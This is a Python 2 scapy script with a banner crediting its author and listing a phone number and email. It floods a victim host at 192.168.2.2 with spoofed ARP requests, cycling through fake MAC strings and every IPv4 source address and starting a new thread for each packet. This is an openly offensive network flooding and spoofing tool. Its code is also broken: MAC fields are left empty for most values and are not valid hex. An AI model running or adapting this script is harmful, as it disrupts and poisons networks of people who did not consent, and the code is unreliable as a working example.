#!/usr/bin/python


#///////////bANNER
"""
          __        _______ _     ____ ___  __  __ _____ 
          \ \      / / ____| |   / ___/ _ \|  \/  | ____|
           \ \ /\ / /|  _| | |  | |  | | | | |\/| |  _|  
            \ V  V / | |___| |__| |__| |_| | |  | | |___  _   _   _ 
             \_/\_/  |_____|_____\____\___/|_|  |_|_____|(_| |_| |_)
                                               
                        Script Crearor: 
     _   _    _____ _    ____    _____  ___     ___    _   _    _    
    | | / \  |  ___/ \  |  _ \  |_   _|/ \ \   / / \  | \ | |  / \   
 _  | |/ _ \ | |_ / _ \ | |_) |   | | / _ \ \ / / _ \ |  \| | / _ \  
| |_| / ___ \|  _/ ___ \|  _ <    | |/ ___ \ V / ___ \| |\  |/ ___ \ 
 \___/_/   \_\_|/_/   \_\_| \_\   |_/_/   \_\_/_/   \_\_| \_/_/   \_\
                                                                     
Tell:  +989170118221   		  Mail: PowerInfoSSL@Gmail.com
"""
##







#!/usr/bin/python

from threading import Thread
from scapy.all import *
conf.verb=0
print 'Your Interface is:'+conf.iface
from time import sleep
sleep(0.5)



def ss(mac,mip,vip):
	p=Ether()/ARP(hwsrc=mac,psrc=mip,pdst=vip,op='who-has')
	sendp(p)

for o1 in range(1,99):
	for o2 in range(99):
		for o3 in range(99):
			for o4 in range(99):
				for o5 in range(99):
					for o6 in range(99):
						w1=''
						w2=''
						w3=''
						w4=''
						w5=''
						w6=''
						if o1<10:
							w1='0'+str(o1)
						if o2<10:
							w2='0'+str(o2)
						if o3<10:
							w3='0'+str(o3)
						if o4<10:
							w4='0'+str(o4)
						if o5<10:
							w5='0'+str(o5)
						if o6<10:
							w6='0'+str(o6)
						pw=w1+':'+w2+':'+w3+':'+w4+':'+w5+':'+w6
						for ip1 in range(1,255):
							for ip2 in range(255):
								for ip3 in range(255):
									for ip4 in range(1,255):
										mip=str(ip1)+'.'+str(ip2)+'.'+str(ip3)+'.'+str(ip4)
										vip='192.168.2.2'
										#print '.'#'MAC='+pw+' My IP='+mip+' Victime IP='+vip
										t=Thread(target=ss, args=(pw,mip,vip))
										t.start()
										#ss(pw,mip,vip)
